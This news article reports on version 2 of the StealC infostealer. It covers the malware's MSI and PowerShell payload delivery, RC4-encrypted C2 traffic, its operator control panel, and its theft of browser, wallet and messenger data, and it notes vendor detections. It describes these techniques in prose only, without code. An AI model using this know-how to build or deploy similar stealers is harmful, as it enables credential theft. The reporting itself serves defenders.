New StealC V2 Expands Capabilities to Exploit MS Installer Packages and PowerShell Scripts

StealC, a prominent infostealer and malware downloader on the cybercrime underground since early 2023, released its much-anticipated version 2 (V2), introducing significant enhancements in both functionality and evasion.

Most notably, V2 introduces advanced payload delivery mechanisms, supporting the execution of Microsoft Software Installer (MSI) packages and PowerShell scripts.

This capability, in addition to traditional EXE execution, marks a pivotal expansion in StealC’s ability to propagate and install secondary payloads within compromised environments.

The malware’s loader can now invoke msiexec.exe with the /passive flag for silent MSI installations, ensuring minimal user disruption and increasing stealth.

PowerShell-based payloads are executed directly using download-and-execute techniques, bypassing many conventional endpoint defenses.

Combined with a robust retry logic for EXE and MSI files, these features enhance payload reliability regardless of delivery channel.

Enhanced Encryption and Evasive C2 Communications

StealC V2’s communication protocol has transitioned to a streamlined, JSON-based format, augmented in recent variants by RC4 encryption for both command-and-control (C2) traffic and internal string obfuscation.

According to Threat Labz, this dual-layer encryption thwarts static signature detection and complicates reverse engineering efforts.

Unique random keys appended to each C2 message further mitigate the risk of behavioral signatures, ensuring operational security for malicious campaigns.

The initial infection beacon now registers each bot via a hardware identifier (HWID), with the server issuing individualized tasking and exfiltration targets per victim endpoint.

An integrated access token controls session integrity-even request errors are stringently handled with explicit opcodes and error codes, offering both resilience and fine-grained operator feedback.

Advanced Control Panel and Customization Features

On the attacker’s backend, the StealC V2 control panel has been overhauled. It now features a tightly integrated builder allowing real-time customization of payload rules, targeting, and botnet behavior.

Operators can fine-tune delivery logic by geolocation, HWID, installed software, or even specific data markers (e.g., credential files containing target strings like “coinbase.com”).

The unified file grabber collects data from a comprehensive set of applications, including browsers, email clients, instant messengers, VPNs, and crypto wallets, while multi-monitor screenshot functionality expands the scope of visual reconnaissance.

The builder and update mechanisms are tightly controlled via the StealC V2 support team, which distributes versioned binaries and RC4 keys through secure update packages.

This controlled distribution ensures all deployed instances remain compatible and obfuscated, reducing the likelihood of researcher tampering.

StealC V2 has already been observed in advanced multi-stage infection chains, often in conjunction with other malware loaders such as Amadey.

The ongoing development-highlighted by rapid feature rollouts like enhanced Firefox plugin loading and improved anti-detection techniques-signals a persistent and evolving threat.

Security vendors, including Zscaler, have responded with layered detection coverage, leveraging sandboxing and signature-based approaches under threat names such as Win64.PWS.Stealc.

Indicators of Compromise (IOCs)

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates